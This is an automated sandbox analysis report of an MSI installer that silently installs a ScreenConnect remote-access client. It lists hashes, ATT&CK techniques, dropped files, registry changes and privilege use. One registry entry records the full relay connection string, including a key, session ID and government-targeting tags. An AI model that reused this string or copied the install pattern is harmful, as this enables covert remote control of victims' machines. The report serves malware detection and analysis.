ac34e44a897a626c34db1c18efcf707fc1d5473a46117586649f31f53c28496a

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
23/08/2024, 02:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ac34e44a897a626c34db1c18efcf707fc1d5473a46117586649f31f53c28496a.msi
Size

7.3MB
MD5

6086601a8560a2037f5091d8632d0509
SHA1

2a7203ea36b649e95f42a2cf0fcf38347d0a7640
SHA256

ac34e44a897a626c34db1c18efcf707fc1d5473a46117586649f31f53c28496a
SHA512

554fb256c1be49942c3c1b2cf1620c8d364a9fa52de7471808ba282019f87703980c9213045123fa5406916bc2e6e60fe963950d4916c622b1edd1f14032864a
SSDEEP

98304:HAMvSQwxDnl2dYds9GLIeDT3OF6zfAMvSQwxDnl2dYdsTAMvSQwxDnl2dYdsbAMF:bnEPDT3wAn/nHn

Score

8^/10

discovery persistence privilege_escalation

Malware Config

Signatures

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (d8713efd2a06052f)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (d8713efd2a06052f)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=instance-s1t9su-relay.screenconnect.com&p=443&s=c408c6ab-66e0-49ac-accd-52b8204cdb5f&k=BgIAAACkAABSU0ExAAgAAAEAAQAZhsU%2bP4UE5AtDTMSFWho25Rl9VjYF8BVBXNwYvU7ugYYwP08h0Z%2fmsf3hdTZqjWU0kI2j8SYjcPTHlmm1DVR4w%2bCnc6S9OaDbDbVnmTAZb4aLnlE0C%2bxZGL%2fgLPE0QdK9YGD5fWjCXXAGAq8z6%2fnmyvLLDh70j0hHGeffkk6HXpjl9E61RXxiCCy3wJleuhdWVSz2TYOAsya%2fs6TEOncLxRX5dVsIpVQHwe%2bApMXuapOWQ1kSv%2bZ0liWHcxZnDeQOpXfTGKLGsTXT3yFLz2B3W33laNnlW%2fpN5y3LSz9plPy4pGcwqi%2bgQpv6KqQ%2b4n55foFDpc6%2fFyuAI8vGWA2l&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAZK1q2mjCJ06dnjGpb4t%2bQAAAAAACAAAAAAAQZgAAAAEAACAAAACehOGxlE2FY5p3e5eB01dfBUwaBoicu4y%2bhwYmVXUl3gAAAAAOgAAAAAIAACAAAAD2jheMzVv7mKIVJtL2kzLHYGESFqQ1vwai8Qr1WoqhsqAEAADcLa93VP2C0skx8B6KBjsl0siJCsvnKTVMwUfyx2kGRZWXhZLPt9NjOuRfduE6g6py3eXlXWril5Sfkn1FDV%2bO8uHxOq43nembAYl4QwavRAsepBAkO5LslgGSIeu7Lrui1YLPX54%2bWc4bYiZkMdSEzhT%2bv0N4kYcZU0SBBT1TRpGv7KwUSQGchGBa2Ml1lGJ3fIAfCIBjCShLK5p5NEj0U74MJHR1wRy8CvJpYX5QS44wDbGXCyFpd2sYo%2b35Sml%2f%2bZcX6eDXYrLqw2VjKH5C%2fSCvkAX5FWTcZcgkaIftaYFY4vnIiSGZxR6YtD3b0wxT2yY77GQilGpJcdxRSC9JBtfrgXNDGRtXVKd12U6ymbe55cR0YimJtlcu8PKTX%2f8exvjLvQG5yKGnCODXqJgfd32%2ft%2fW2XJFOnz50jgGYkC%2flxWCPUPGCmR51cri2lI%2b%2bGamtODXZKb7grQZ8A7DWJ6V84mJiLf80oPAKl9erGIZFI6a2pipAhwfrgcTLU4CwKVcD6kZ74ypFHJtw%2brtjbfB164eJsZVlam3%2bq70hZCMQCeSH2IiA3x5sSp3SwR39rdPetSD097BpS9APnbdIcQCaycUL%2fwNdLDm%2byQHb0gIpKkmG2%2fEg%2bSEHNLw7ODagwEYSax5pE5nCeS%2fm6PI0YWGxHYZj3BBILXWPifM8cK9n8rs%2ftvaxM%2fZfWHwx0ppvKvwODNxr53hwEoFCuS5%2biBc9tH3kr09L0qoA3u2lcPv%2bZB5GuG9qi5z1FBXB53vwMPo%2b%2fTkp5N1JPgIWbUP1XTZ7%2f7NtZbV8L9sIC6EjER8DHODeD2TEcs%2fU1zXDnMAo5J2HV81tNzaE%2bkZNYTmZeZ%2ftJ7OXrlNEPBeHRPUHVQ9fbBxK%2bX44kl3gEaSdubIy5K2%2bF3GoNprK2hcg7V%2fPl8kqyEfAf%2bQdI0yFUbWHioUD9qOiSxHyWwEHr0u9bpcIc5HTGQxUXUbhijKzN25dZxLnQl96gaqiaua4RsrKE4c2UQJOwFMIP%2b7ZZMgvO7VLujXNVVDd7KrtMxWFhIBimOpLeGiQ73KQ2iS6n6TvpEFgVokvT14aD2P%2bD1n60S2kKuJfI2mow29hlvOjKGtz5OlGP2gZIZVj%2bkCPxNDcXtUS8OmKAkntflYjjtDnNF%2fh2W7oqorWQHEPjxkUlZtMzGXebTPbWsNKEkNHm%2bPeK1Wj6ZbCTMAN8B0tg8nCkC2qcSzvD9xdliKOHfjigjspvuQkTBE6Lg3tcG3trhHDWlR516f6s1%2fwAeGOMXhHsSD3tmN%2b33a%2bjn85bymT2jsGmNUEc4EquwruS9%2bYMeoUAA0hzSfFOVOESYj%2f37kfyxyXyefmtcbUAJi5eKL76xT5obSuD1du4G1d4GLtqS52nrKYJ7pmNEiz6qgjlgxbZ3rEhSclhQbB85xyVorbcT%2f35%2bjy1%2foq%2bOofBoPAkWDNckRp9uaql5ZiWUzIZIoICz2ZRnT0GHWS9CnRJtVB5u375A76LSA4JgNfnM26CYQvCq9oRyB9xuPKJeG%2btXGuQUitkxWsWGrpFgHRvzfazETQj%2bs1K9utoEV8PReYizhNiEAAAABrLn04Cv81o0ZmZoO5azZ%2f8d3ENHBnHhkIOBqrvOLsqFnLJWdz2%2b%2bM4xZonANULyjPi%2brBKrWJ1k%2bET9kLimhr&c=government&c=gov.al&c=it&c=pc&c=&c=&c=&c=\""	ScreenConnect.ClientService.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Drops file in Program Files directory 13 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.WindowsClient.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.WindowsCredentialProvider.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.ClientService.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.ClientService.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\Client.en-US.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\Client.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\system.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.WindowsClient.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.WindowsBackstageShell.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.Core.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.Windows.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.WindowsBackstageShell.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.Client.dll	msiexec.exe

Drops file in Windows directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File created	C:\Windows\Installer\{8582563A-FD89-E753-F1A0-2CF5D123E232}\DefaultIcon	msiexec.exe
File opened for modification	C:\Windows\Installer\{8582563A-FD89-E753-F1A0-2CF5D123E232}\DefaultIcon	msiexec.exe
File created	C:\Windows\Installer\f765b4b.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\f765b4b.ipi	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.ev1	DrvInst.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI75DC.tmp	msiexec.exe
File created	C:\Windows\Installer\wix{8582563A-FD89-E753-F1A0-2CF5D123E232}.SchedServiceConfig.rmi	MsiExec.exe
File created	C:\Windows\Installer\f765b4d.msi	msiexec.exe
File created	C:\Windows\Installer\f765b4a.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f765b4a.msi	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.ev3	DrvInst.exe
File opened for modification	C:\Windows\Installer\MSI75CC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI767A.tmp	msiexec.exe

Executes dropped EXE 2 IoCs

pid	Process
2524	ScreenConnect.ClientService.exe
968	ScreenConnect.WindowsClient.exe

Loads dropped DLL 22 IoCs

pid	Process
2864	MsiExec.exe
2696	rundll32.exe
2696	rundll32.exe
2696	rundll32.exe
2696	rundll32.exe
2696	rundll32.exe
2696	rundll32.exe
2696	rundll32.exe
2024	MsiExec.exe
2176	MsiExec.exe
2524	ScreenConnect.ClientService.exe
2524	ScreenConnect.ClientService.exe
2524	ScreenConnect.ClientService.exe
2524	ScreenConnect.ClientService.exe
2524	ScreenConnect.ClientService.exe
2524	ScreenConnect.ClientService.exe
2524	ScreenConnect.ClientService.exe
2524	ScreenConnect.ClientService.exe
2524	ScreenConnect.ClientService.exe
2524	ScreenConnect.ClientService.exe
2524	ScreenConnect.ClientService.exe
2524	ScreenConnect.ClientService.exe

Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs

persistence privilege_escalation

Installer Packages

T1546.016

Msiexec

T1218.007

pid	Process
2480	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe

Modifies data under HKEY_USERS 49 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe

Modifies registry class 37 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\257FF64927B44E318D17E3DFA26050F2\A365285898DF357E1F0AC25F1D322E23	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A365285898DF357E1F0AC25F1D322E23\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d8713efd2a06052f\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (d8713efd2a06052f)\\ScreenConnect.WindowsClient.exe\" \"%1\""	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A365285898DF357E1F0AC25F1D322E23\PackageCode = "A365285898DF357E1F0AC25F1D322E23"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A365285898DF357E1F0AC25F1D322E23\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A365285898DF357E1F0AC25F1D322E23\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d8713efd2a06052f\URL Protocol	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A365285898DF357E1F0AC25F1D322E23	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A365285898DF357E1F0AC25F1D322E23\SourceList\Media	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A365285898DF357E1F0AC25F1D322E23\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A365285898DF357E1F0AC25F1D322E23\SourceList\Media\1 = ";"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-d8713efd2a06052f	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d8713efd2a06052f\shell	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A365285898DF357E1F0AC25F1D322E23\ProductName = "ScreenConnect Client (d8713efd2a06052f)"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-d8713efd2a06052f\shell\open\command	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A365285898DF357E1F0AC25F1D322E23\Version = "386400261"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A365285898DF357E1F0AC25F1D322E23\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d8713efd2a06052f	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A365285898DF357E1F0AC25F1D322E23\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A365285898DF357E1F0AC25F1D322E23\Language = "1033"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\257FF64927B44E318D17E3DFA26050F2	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d8713efd2a06052f\UseOriginalUrlEncoding = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-B7B0-A2899034F188}\ = "ScreenConnect Client (d8713efd2a06052f) Credential Provider"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-B7B0-A2899034F188}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (d8713efd2a06052f)\\ScreenConnect.WindowsCredentialProvider.dll"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A365285898DF357E1F0AC25F1D322E23\InstanceType = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A365285898DF357E1F0AC25F1D322E23\SourceList\PackageName = "ac34e44a897a626c34db1c18efcf707fc1d5473a46117586649f31f53c28496a.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A365285898DF357E1F0AC25F1D322E23\SourceList\Net	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A365285898DF357E1F0AC25F1D322E23\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-B7B0-A2899034F188}	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-B7B0-A2899034F188}\InprocServer32\ThreadingModel = "Apartment"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A365285898DF357E1F0AC25F1D322E23\ProductIcon = "C:\\Windows\\Installer\\{8582563A-FD89-E753-F1A0-2CF5D123E232}\\DefaultIcon"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\A365285898DF357E1F0AC25F1D322E23	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\A365285898DF357E1F0AC25F1D322E23\Full	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A365285898DF357E1F0AC25F1D322E23\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d8713efd2a06052f\shell\open	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d8713efd2a06052f\shell\open\command	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-B7B0-A2899034F188}\InprocServer32	msiexec.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
968	ScreenConnect.WindowsClient.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2796	msiexec.exe
2796	msiexec.exe
2524	ScreenConnect.ClientService.exe
2524	ScreenConnect.ClientService.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2480	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2480	msiexec.exe
Token: SeRestorePrivilege	2796	msiexec.exe
Token: SeTakeOwnershipPrivilege	2796	msiexec.exe
Token: SeSecurityPrivilege	2796	msiexec.exe
Token: SeCreateTokenPrivilege	2480	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2480	msiexec.exe
Token: SeLockMemoryPrivilege	2480	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2480	msiexec.exe
Token: SeMachineAccountPrivilege	2480	msiexec.exe
Token: SeTcbPrivilege	2480	msiexec.exe
Token: SeSecurityPrivilege	2480	msiexec.exe
Token: SeTakeOwnershipPrivilege	2480	msiexec.exe
Token: SeLoadDriverPrivilege	2480	msiexec.exe
Token: SeSystemProfilePrivilege	2480	msiexec.exe
Token: SeSystemtimePrivilege	2480	msiexec.exe
Token: SeProfSingleProcessPrivilege	2480	msiexec.exe
Token: SeIncBasePriorityPrivilege	2480	msiexec.exe
Token: SeCreatePagefilePrivilege	2480	msiexec.exe
Token: SeCreatePermanentPrivilege	2480	msiexec.exe
Token: SeBackupPrivilege	2480	msiexec.exe
Token: SeRestorePrivilege	2480	msiexec.exe
Token: SeShutdownPrivilege	2480	msiexec.exe
Token: SeDebugPrivilege	2480	msiexec.exe
Token: SeAuditPrivilege	2480	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2480	msiexec.exe
Token: SeChangeNotifyPrivilege	2480	msiexec.exe
Token: SeRemoteShutdownPrivilege	2480	msiexec.exe
Token: SeUndockPrivilege	2480	msiexec.exe
Token: SeSyncAgentPrivilege	2480	msiexec.exe
Token: SeEnableDelegationPrivilege	2480	msiexec.exe
Token: SeManageVolumePrivilege	2480	msiexec.exe
Token: SeImpersonatePrivilege	2480	msiexec.exe
Token: SeCreateGlobalPrivilege	2480	msiexec.exe
Token: SeCreateTokenPrivilege	2480	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2480	msiexec.exe
Token: SeLockMemoryPrivilege	2480	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2480	msiexec.exe
Token: SeMachineAccountPrivilege	2480	msiexec.exe
Token: SeTcbPrivilege	2480	msiexec.exe
Token: SeSecurityPrivilege	2480	msiexec.exe
Token: SeTakeOwnershipPrivilege	2480	msiexec.exe
Token: SeLoadDriverPrivilege	2480	msiexec.exe
Token: SeSystemProfilePrivilege	2480	msiexec.exe
Token: SeSystemtimePrivilege	2480	msiexec.exe
Token: SeProfSingleProcessPrivilege	2480	msiexec.exe
Token: SeIncBasePriorityPrivilege	2480	msiexec.exe
Token: SeCreatePagefilePrivilege	2480	msiexec.exe
Token: SeCreatePermanentPrivilege	2480	msiexec.exe
Token: SeBackupPrivilege	2480	msiexec.exe
Token: SeRestorePrivilege	2480	msiexec.exe
Token: SeShutdownPrivilege	2480	msiexec.exe
Token: SeDebugPrivilege	2480	msiexec.exe
Token: SeAuditPrivilege	2480	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2480	msiexec.exe
Token: SeChangeNotifyPrivilege	2480	msiexec.exe
Token: SeRemoteShutdownPrivilege	2480	msiexec.exe
Token: SeUndockPrivilege	2480	msiexec.exe
Token: SeSyncAgentPrivilege	2480	msiexec.exe
Token: SeEnableDelegationPrivilege	2480	msiexec.exe
Token: SeManageVolumePrivilege	2480	msiexec.exe
Token: SeImpersonatePrivilege	2480	msiexec.exe
Token: SeCreateGlobalPrivilege	2480	msiexec.exe
Token: SeCreateTokenPrivilege	2480	msiexec.exe

Suspicious use of FindShellTrayWindow 18 IoCs

pid	Process
2480	msiexec.exe
